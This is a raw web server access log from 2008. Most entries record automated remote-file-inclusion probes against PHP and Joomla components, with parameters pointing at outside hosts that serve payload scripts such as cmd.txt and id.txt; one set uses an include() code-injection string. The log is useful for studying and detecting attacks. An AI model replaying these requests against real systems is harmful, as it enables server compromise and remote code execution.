72.232.245.106 - - [25/Mar/2008:08:24:24 -0700] "GET /logs/access.log//init_basic.php?GALLERY_BASEDIR=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:08:25:31 -0700] "GET /logs/access.log//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:08:25:31 -0700] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [25/Mar/2008:08:25:32 -0700] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:26:02 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:26:10 -0700] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:26:10 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:08:26:10 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:08:26:26 -0700] "GET /akocomments.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.7.93 - - [25/Mar/2008:08:26:37 -0700] "GET /bikes/?D=D HTTP/1.0" 200 2304 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:26:47 -0700] "GET //login.php?dir=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:27:16 -0700] "GET /logs/access.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:27:17 -0700] "GET /ncaster/admin/addons/archive/archive.php?adminfolder=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:27:17 -0700] "GET /logs/ncaster/admin/addons/archive/archive.php?adminfolder=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.15.135 - - [25/Mar/2008:08:27:17 -0700] "GET /logs/access_080312.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://danthefarrier.co.uk/id/mic22.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.29.71.91 - - [25/Mar/2008:08:27:43 -0700] "GET /main.php?x=http://netbr.org/documents/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.90 - - [25/Mar/2008:08:27:45 -0700] "GET /logs/access_080312.log/index.php?redir=http://www.rayzorowns.kit.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:28:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.67.120.48 - - [25/Mar/2008:08:29:07 -0700] "GET //include.php?path[docroot]=http://www.discapacidadesecuador.org/cache/.ownz/safeon.gif???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.221.91.28 - - [25/Mar/2008:08:29:14 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
69.61.37.111 - - [25/Mar/2008:08:30:53 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:08:30:55 -0700] "GET //administrator/components/com_jjgallery/admin.jjgallery.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:31:08 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:31:08 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
202.181.99.12 - - [25/Mar/2008:08:31:20 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.revistaeducando.com.br/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:08:31:41 -0700] "GET /logs/access_080207.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:08:31:41 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:08:31:42 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:32:50 -0700] "GET /logs/access_080207.log//newspublish/include.php?path%5Bdocroot%5D=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:08:32:52 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:08:32:52 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:08:32:53 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:08:33:00 -0700] "GET /logs/access_080207.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:08:33:00 -0700] "GET //inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:08:33:01 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:33:18 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:33:18 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:33:18 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:33:21 -0700] "GET /logs/access_080223.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:33:21 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:33:21 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:33:30 -0700] "GET /logs/access_080117.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:33:30 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:33:35 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:33:56 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:33:56 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:33:57 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.232.245.106 - - [25/Mar/2008:08:34:01 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:34:36 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:34:36 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
72.30.179.247 - - [25/Mar/2008:08:34:50 -0700] "GET /logs/access_080308.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:35:08 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:35:08 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:35:09 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:08:35:10 -0700] "GET /logs/access_080215.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:08:35:16 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.135.200.3 - - [25/Mar/2008:08:35:27 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.ritterspektakel-leipzig.de/administrator/can? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:08:35:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:08:35:32 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
74.6.18.170 - - [25/Mar/2008:08:35:43 -0700] "GET /megumi/?S=A HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
124.217.247.166 - - [25/Mar/2008:08:35:46 -0700] "GET /logs/access_080306.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.cyberzane.net/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.118.252.252 - - [25/Mar/2008:08:35:47 -0700] "GET /logs/access_080223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.118.252.252 - - [25/Mar/2008:08:35:48 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.118.252.252 - - [25/Mar/2008:08:35:48 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
202.181.99.12 - - [25/Mar/2008:08:36:01 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.revistaeducando.com.br/infect.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:36:12 -0700] "GET /logs/access_080207.log/components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:36:12 -0700] "GET /components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:36:12 -0700] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:08:36:12 -0700] "GET /logs/index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
87.118.102.153 - - [25/Mar/2008:08:36:12 -0700] "GET /index.php?option=com_babackup&Itemid=&mosConfig_absolute_path=http://www.smagz.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.118.252.252 - - [25/Mar/2008:08:36:15 -0700] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:36:17 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:36:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:36:17 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [25/Mar/2008:08:36:20 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [25/Mar/2008:08:36:21 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.220.122 - - [25/Mar/2008:08:36:21 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:36:22 -0700] "GET /logs/access_080131.log//modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:36:22 -0700] "GET //modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.71.191.190 - - [25/Mar/2008:08:36:23 -0700] "GET /logs//modules/Neos_Chronos/header.php?base_folder=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.254.233 - - [25/Mar/2008:08:36:23 -0700] "GET /logs/access.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:36:30 -0700] "GET /logs/access_080218.log/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:36:31 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:36:31 -0700] "GET /logs/components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.70.36.184 - - [25/Mar/2008:08:36:36 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Jyxobot/1" "www.dmulk.com"
72.55.165.116 - - [25/Mar/2008:08:36:38 -0700] "GET /logs/access_071122.log/components/com_simpleboard/image_upload.php?sbp=http://12.30.229.109/images/.../di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.98.246.23 - - [25/Mar/2008:08:36:40 -0700] "GET /logs/access_070923.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:36:44 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:36:45 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.108.67.176 - - [25/Mar/2008:08:36:45 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.184 - - [25/Mar/2008:08:36:50 -0700] "GET /presto/ HTTP/1.0" 200 510 "-" "Jyxobot/1" "www.dmulk.com"
74.6.16.243 - - [25/Mar/2008:08:37:05 -0700] "GET /megumi/?N=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:37:16 -0700] "GET /logs/access_071109.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:37:17 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.109.250.64 - - [25/Mar/2008:08:37:17 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.118.252.252 - - [25/Mar/2008:08:37:42 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://konfraternia.tarnow.pl/cutenews/data/.yop/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:37:43 -0700] "GET /logs/access_080201.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:37:43 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:08:37:44 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.21.103 - - [25/Mar/2008:08:37:56 -0700] "GET /bikes/GPS/?N=A HTTP/1.0" 200 800 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:38:29 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:08:38:29 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:08:38:41 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:38:41 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:38:42 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.113.108.77 - - [25/Mar/2008:08:38:42 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:08:38:54 -0700] "GET /errors.php?error=http://www.benew.nl/vragenlijst/classes/adodb/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:38:56 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:38:56 -0700] "GET /logs/access_080119.log/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:38:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Mar/2008:08:38:56 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/Rayen/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
